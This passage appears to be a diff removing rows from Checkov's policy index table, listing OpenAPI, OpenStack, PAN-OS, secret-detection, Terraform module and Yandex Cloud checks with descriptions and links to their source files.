-| 3560 | CKV_OPENAPI_3            | resource                         | components                                                                                       | Ensure that security schemes don't allow cleartext credentials over unencrypted channel - version 3.x.y files                                                                                            | OpenAPI                 | [CleartextOverUnencryptedChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py)                                                            |
-| 3561 | CKV_OPENAPI_4            | resource                         | security                                                                                         | Ensure that the global security field has rules defined                                                                                                                                                  | OpenAPI                 | [GlobalSecurityFieldIsEmpty.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py)                                                                 |
-| 3562 | CKV_OPENAPI_5            | resource                         | security                                                                                         | Ensure that security operations is not empty.                                                                                                                                                            | OpenAPI                 | [SecurityOperations.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/SecurityOperations.py)                                                                                 |
-| 3563 | CKV_OPENAPI_6            | resource                         | security                                                                                         | Ensure that security requirement defined in securityDefinitions - version 2.0 files                                                                                                                      | OpenAPI                 | [SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityRequirement.py)                                                                                    |
-| 3564 | CKV_OPENAPI_7            | resource                         | security                                                                                         | Ensure that the path scheme does not support unencrypted HTTP connection where all transmissions are open to interception- version 2.0 files                                                             | OpenAPI                 | [PathSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/PathSchemeDefineHTTP.py)                                                                                  |
-| 3565 | CKV_OPENAPI_8            | resource                         | security                                                                                         | Ensure that security is not using 'password' flow in OAuth2 authentication - version 2.0 files                                                                                                           | OpenAPI                 | [Oauth2SecurityPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityPasswordFlow.py)                                                                      |
-| 3566 | CKV_OPENAPI_9            | resource                         | paths                                                                                            | Ensure that security scopes of operations are defined in securityDefinitions - version 2.0 files                                                                                                         | OpenAPI                 | [OperationObjectSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectSecurityScopeUndefined.py)                                                |
-| 3567 | CKV_OPENAPI_10           | resource                         | paths                                                                                            | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files                                                                                                   | OpenAPI                 | [Oauth2OperationObjectPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2OperationObjectPasswordFlow.py)                                                        |
-| 3568 | CKV_OPENAPI_11           | resource                         | securityDefinitions                                                                              | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files                                                                                                   | OpenAPI                 | [Oauth2SecurityDefinitionPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionPasswordFlow.py)                                                  |
-| 3569 | CKV_OPENAPI_12           | resource                         | securityDefinitions                                                                              | Ensure no security definition is using implicit flow on OAuth2, which is deprecated - version 2.0 files                                                                                                  | OpenAPI                 | [Oauth2SecurityDefinitionImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionImplicitFlow.py)                                                  |
-| 3570 | CKV_OPENAPI_13           | resource                         | securityDefinitions                                                                              | Ensure security definitions do not use basic auth - version 2.0 files                                                                                                                                    | OpenAPI                 | [SecurityDefinitionBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitionBasicAuth.py)                                                                    |
-| 3571 | CKV_OPENAPI_14           | resource                         | paths                                                                                            | Ensure that operation objects do not use 'implicit' flow, which is deprecated - version 2.0 files                                                                                                        | OpenAPI                 | [OperationObjectImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectImplicitFlow.py)                                                                    |
-| 3572 | CKV_OPENAPI_15           | resource                         | paths                                                                                            | Ensure that operation objects do not use basic auth - version 2.0 files                                                                                                                                  | OpenAPI                 | [OperationObjectBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectBasicAuth.py)                                                                          |
-| 3573 | CKV_OPENAPI_16           | resource                         | paths                                                                                            | Ensure that operation objects have 'produces' field defined for GET operations - version 2.0 files                                                                                                       | OpenAPI                 | [OperationObjectProducesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectProducesUndefined.py)                                                          |
-| 3574 | CKV_OPENAPI_17           | resource                         | paths                                                                                            | Ensure that operation objects have 'consumes' field defined for PUT, POST and PATCH operations - version 2.0 files                                                                                       | OpenAPI                 | [OperationObjectConsumesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectConsumesUndefined.py)                                                          |
-| 3575 | CKV_OPENAPI_18           | resource                         | schemes                                                                                          | Ensure that global schemes use 'https' protocol instead of 'http'- version 2.0 files                                                                                                                     | OpenAPI                 | [GlobalSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSchemeDefineHTTP.py)                                                                              |
-| 3576 | CKV_OPENAPI_19           | resource                         | security                                                                                         | Ensure that global security scope is defined in securityDefinitions - version 2.0 files                                                                                                                  | OpenAPI                 | [GlobalSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSecurityScopeUndefined.py)                                                                  |
-| 3577 | CKV_OPENAPI_20           | resource                         | paths                                                                                            | Ensure that API keys are not sent over cleartext                                                                                                                                                         | OpenAPI                 | [ClearTextAPIKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/ClearTextAPIKey.py)                                                                                       |
-| 3578 | CKV_OPENAPI_21           | resource                         | paths                                                                                            | Ensure that arrays have a maximum number of items                                                                                                                                                        | OpenAPI                 | [NoMaximumNumberItems.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/NoMaximumNumberItems.py)                                                                             |
-| 3579 | CKV_OPENSTACK_1          | provider                         | openstack                                                                                        | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider                                                                                                      | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py)                                                                                           |
-| 3580 | CKV_OPENSTACK_2          | resource                         | openstack_compute_secgroup_v2                                                                    | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)                                                                                                                            | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py)                                             |
-| 3581 | CKV_OPENSTACK_2          | resource                         | openstack_networking_secgroup_rule_v2                                                            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)                                                                                                                            | Terraform               | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py)                                             |
-| 3582 | CKV_OPENSTACK_3          | resource                         | openstack_compute_secgroup_v2                                                                    | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)                                                                                                                          | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py)                                         |
-| 3583 | CKV_OPENSTACK_3          | resource                         | openstack_networking_secgroup_rule_v2                                                            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)                                                                                                                          | Terraform               | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py)                                         |
-| 3584 | CKV_OPENSTACK_4          | resource                         | openstack_compute_instance_v2                                                                    | Ensure that instance does not use basic credentials                                                                                                                                                      | Terraform               | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py)                                                         |
-| 3585 | CKV_OPENSTACK_5          | resource                         | openstack_fw_rule_v1                                                                             | Ensure firewall rule set a destination IP                                                                                                                                                                | Terraform               | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py)                                                         |
-| 3586 | CKV_PAN_1                | provider                         | panos                                                                                            | Ensure no hard coded PAN-OS credentials exist in provider                                                                                                                                                | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py)                                                                                               |
-| 3587 | CKV_PAN_2                | resource                         | panos_management_profile                                                                         | Ensure plain-text management HTTP is not enabled for an Interface Management Profile                                                                                                                     | Terraform               | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py)                                                                 |
-| 3588 | CKV_PAN_2                | resource                         | tasks.paloaltonetworks.panos.panos_management_profile                                            | Ensure plain-text management HTTP is not enabled for an Interface Management Profile                                                                                                                     | Ansible                 | [PanosInterfaceMgmtProfileNoHTTP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoHTTP.yaml)                                                       |
-| 3589 | CKV_PAN_3                | resource                         | panos_management_profile                                                                         | Ensure plain-text management Telnet is not enabled for an Interface Management Profile                                                                                                                   | Terraform               | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py)                                                             |
-| 3590 | CKV_PAN_3                | resource                         | tasks.paloaltonetworks.panos.panos_management_profile                                            | Ensure plain-text management Telnet is not enabled for an Interface Management Profile                                                                                                                   | Ansible                 | [PanosInterfaceMgmtProfileNoTelnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoTelnet.yaml)                                                   |
-| 3591 | CKV_PAN_4                | resource                         | panos_security_policy                                                                            | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Terraform               | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py)                                                                                             |
-| 3592 | CKV_PAN_4                | resource                         | panos_security_rule_group                                                                        | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Terraform               | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py)                                                                                             |
-| 3593 | CKV_PAN_4                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Ansible                 | [PanosPolicyNoDSRI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoDSRI.yaml)                                                                                   |
-| 3594 | CKV_PAN_5                | resource                         | panos_security_policy                                                                            | Ensure security rules do not have 'applications' set to 'any'                                                                                                                                            | Terraform               | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py)                                                                         |
-| 3595 | CKV_PAN_5                | resource                         | panos_security_rule_group                                                                        | Ensure security rules do not have 'applications' set to 'any'                                                                                                                                            | Terraform               | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py)                                                                         |
-| 3596 | CKV_PAN_5                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure security rules do not have 'application' set to 'any'                                                                                                                                             | Ansible                 | [PanosPolicyNoApplicationAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoApplicationAny.yaml)                                                               |
-| 3597 | CKV_PAN_6                | resource                         | panos_security_policy                                                                            | Ensure security rules do not have 'services' set to 'any'                                                                                                                                                | Terraform               | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py)                                                                                 |
-| 3598 | CKV_PAN_6                | resource                         | panos_security_rule_group                                                                        | Ensure security rules do not have 'services' set to 'any'                                                                                                                                                | Terraform               | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py)                                                                                 |
-| 3599 | CKV_PAN_6                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure security rules do not have 'service' set to 'any'                                                                                                                                                 | Ansible                 | [PanosPolicyNoServiceAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoServiceAny.yaml)                                                                       |
-| 3600 | CKV_PAN_7                | resource                         | panos_security_policy                                                                            | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any'                                                                                         | Terraform               | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py)                                                                             |
-| 3601 | CKV_PAN_7                | resource                         | panos_security_rule_group                                                                        | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any'                                                                                         | Terraform               | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py)                                                                             |
-| 3602 | CKV_PAN_7                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure security rules do not have 'source_ip' and 'destination_ip' both containing values of 'any'                                                                                                       | Ansible                 | [PanosPolicyNoSrcAnyDstAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcAnyDstAny.yaml)                                                                   |
-| 3603 | CKV_PAN_8                | resource                         | panos_security_policy                                                                            | Ensure description is populated within security policies                                                                                                                                                 | Terraform               | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py)                                                                                   |
-| 3604 | CKV_PAN_8                | resource                         | panos_security_rule_group                                                                        | Ensure description is populated within security policies                                                                                                                                                 | Terraform               | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py)                                                                                   |
-| 3605 | CKV_PAN_8                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure description is populated within security policies                                                                                                                                                 | Ansible                 | [PanosPolicyDescription.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyDescription.yaml)                                                                         |
-| 3606 | CKV_PAN_9                | resource                         | panos_security_policy                                                                            | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Terraform               | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py)                                                                               |
-| 3607 | CKV_PAN_9                | resource                         | panos_security_rule_group                                                                        | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Terraform               | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py)                                                                               |
-| 3608 | CKV_PAN_9                | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Ansible                 | [PanosPolicyLogForwarding.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogForwarding.yaml)                                                                     |
-| 3609 | CKV_PAN_10               | resource                         | panos_security_policy                                                                            | Ensure logging at session end is enabled within security policies                                                                                                                                        | Terraform               | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py)                                                                             |
-| 3610 | CKV_PAN_10               | resource                         | panos_security_rule_group                                                                        | Ensure logging at session end is enabled within security policies                                                                                                                                        | Terraform               | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py)                                                                             |
-| 3611 | CKV_PAN_10               | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure logging at session end is enabled within security policies                                                                                                                                        | Ansible                 | [PanosPolicyLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLoggingEnabled.yaml)                                                                   |
-| 3612 | CKV_PAN_11               | resource                         | panos_ipsec_crypto_profile                                                                       | Ensure IPsec profiles do not specify use of insecure encryption algorithms                                                                                                                               | Terraform               | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py)                                                                         |
-| 3613 | CKV_PAN_11               | resource                         | panos_panorama_ipsec_crypto_profile                                                              | Ensure IPsec profiles do not specify use of insecure encryption algorithms                                                                                                                               | Terraform               | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py)                                                                         |
-| 3614 | CKV_PAN_12               | resource                         | panos_ipsec_crypto_profile                                                                       | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Terraform               | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py)                                                                 |
-| 3615 | CKV_PAN_12               | resource                         | panos_panorama_ipsec_crypto_profile                                                              | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Terraform               | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py)                                                                 |
-| 3616 | CKV_PAN_12               | resource                         | tasks.paloaltonetworks.panos.panos_ipsec_profile                                                 | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Ansible                 | [PanosIPsecAuthenticationAlgorithms.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecAuthenticationAlgorithms.yaml)                                                 |
-| 3617 | CKV_PAN_13               | resource                         | panos_ipsec_crypto_profile                                                                       | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Terraform               | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py)                                                                           |
-| 3618 | CKV_PAN_13               | resource                         | panos_panorama_ipsec_crypto_profile                                                              | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Terraform               | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py)                                                                           |
-| 3619 | CKV_PAN_13               | resource                         | tasks.paloaltonetworks.panos.panos_ipsec_profile                                                 | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Ansible                 | [PanosIPsecProtocols.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecProtocols.yaml)                                                                               |
-| 3620 | CKV_PAN_14               | resource                         | panos_panorama_zone                                                                              | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform               | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                           |
-| 3621 | CKV_PAN_14               | resource                         | panos_zone                                                                                       | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform               | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                           |
-| 3622 | CKV_PAN_14               | resource                         | panos_zone_entry                                                                                 | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform               | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                           |
-| 3623 | CKV_PAN_14               | resource                         | tasks.paloaltonetworks.panos.panos_zone                                                          | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Ansible                 | [PanosZoneProtectionProfile.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneProtectionProfile.yaml)                                                                 |
-| 3624 | CKV_PAN_15               | resource                         | panos_panorama_zone                                                                              | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Terraform               | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py)                                                                             |
-| 3625 | CKV_PAN_15               | resource                         | panos_zone                                                                                       | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Terraform               | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py)                                                                             |
-| 3626 | CKV_PAN_15               | resource                         | tasks.paloaltonetworks.panos.panos_zone                                                          | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Ansible                 | [PanosZoneUserIDIncludeACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneUserIDIncludeACL.yaml)                                                                   |
-| 3627 | CKV_PAN_16               | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure logging at session start is disabled within security policies except for troubleshooting and long lived GRE tunnels                                                                               | Ansible                 | [PanosPolicyLogSessionStart.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogSessionStart.yaml)                                                                 |
-| 3628 | CKV_PAN_17               | resource                         | tasks.paloaltonetworks.panos.panos_security_rule                                                 | Ensure security rules do not have 'source_zone' and 'destination_zone' both containing values of 'any'                                                                                                   | Ansible                 | [PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml)                                               |
-| 3629 | CKV_SECRET_1             | Artifactory Credentials          | secrets                                                                                          | Artifactory Credentials                                                                                                                                                                                  | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3630 | CKV_SECRET_2             | AWS Access Key                   | secrets                                                                                          | AWS Access Key                                                                                                                                                                                           | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3631 | CKV_SECRET_3             | Azure Storage Account access key | secrets                                                                                          | Azure Storage Account access key                                                                                                                                                                         | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3632 | CKV_SECRET_4             | Basic Auth Credentials           | secrets                                                                                          | Basic Auth Credentials                                                                                                                                                                                   | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3633 | CKV_SECRET_5             | Cloudant Credentials             | secrets                                                                                          | Cloudant Credentials                                                                                                                                                                                     | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3634 | CKV_SECRET_6             | Base64 High Entropy String       | secrets                                                                                          | Base64 High Entropy String                                                                                                                                                                               | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3635 | CKV_SECRET_7             | IBM Cloud IAM Key                | secrets                                                                                          | IBM Cloud IAM Key                                                                                                                                                                                        | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3636 | CKV_SECRET_8             | IBM COS HMAC Credentials         | secrets                                                                                          | IBM COS HMAC Credentials                                                                                                                                                                                 | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3637 | CKV_SECRET_9             | JSON Web Token                   | secrets                                                                                          | JSON Web Token                                                                                                                                                                                           | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3638 | CKV_SECRET_11            | Mailchimp Access Key             | secrets                                                                                          | Mailchimp Access Key                                                                                                                                                                                     | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3639 | CKV_SECRET_12            | NPM tokens                       | secrets                                                                                          | NPM tokens                                                                                                                                                                                               | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3640 | CKV_SECRET_13            | Private Key                      | secrets                                                                                          | Private Key                                                                                                                                                                                              | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3641 | CKV_SECRET_14            | Slack Token                      | secrets                                                                                          | Slack Token                                                                                                                                                                                              | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3642 | CKV_SECRET_15            | SoftLayer Credentials            | secrets                                                                                          | SoftLayer Credentials                                                                                                                                                                                    | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3643 | CKV_SECRET_16            | Square OAuth Secret              | secrets                                                                                          | Square OAuth Secret                                                                                                                                                                                      | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3644 | CKV_SECRET_17            | Stripe Access Key                | secrets                                                                                          | Stripe Access Key                                                                                                                                                                                        | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3645 | CKV_SECRET_18            | Twilio API Key                   | secrets                                                                                          | Twilio API Key                                                                                                                                                                                           | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3646 | CKV_SECRET_19            | Hex High Entropy String          | secrets                                                                                          | Hex High Entropy String                                                                                                                                                                                  | secrets                 | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py)                                               |
-| 3647 | CKV_TF_1                 | module                           | module                                                                                           | Ensure Terraform module sources use a commit hash                                                                                                                                                        | Terraform               | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py)                                                                                             |
-| 3648 | CKV_YC_1                 | resource                         | yandex_mdb_clickhouse_cluster                                                                    | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 3649 | CKV_YC_1                 | resource                         | yandex_mdb_elasticsearch_cluster                                                                 | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 3650 | CKV_YC_1                 | resource                         | yandex_mdb_greenplum_cluster                                                                     | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 3651 | CKV_YC_1                 | resource                         | yandex_mdb_kafka_cluster                                                                         | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 3652 | CKV_YC_1                 | resource                         | yandex_mdb_mongodb_cluster                                                                       | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
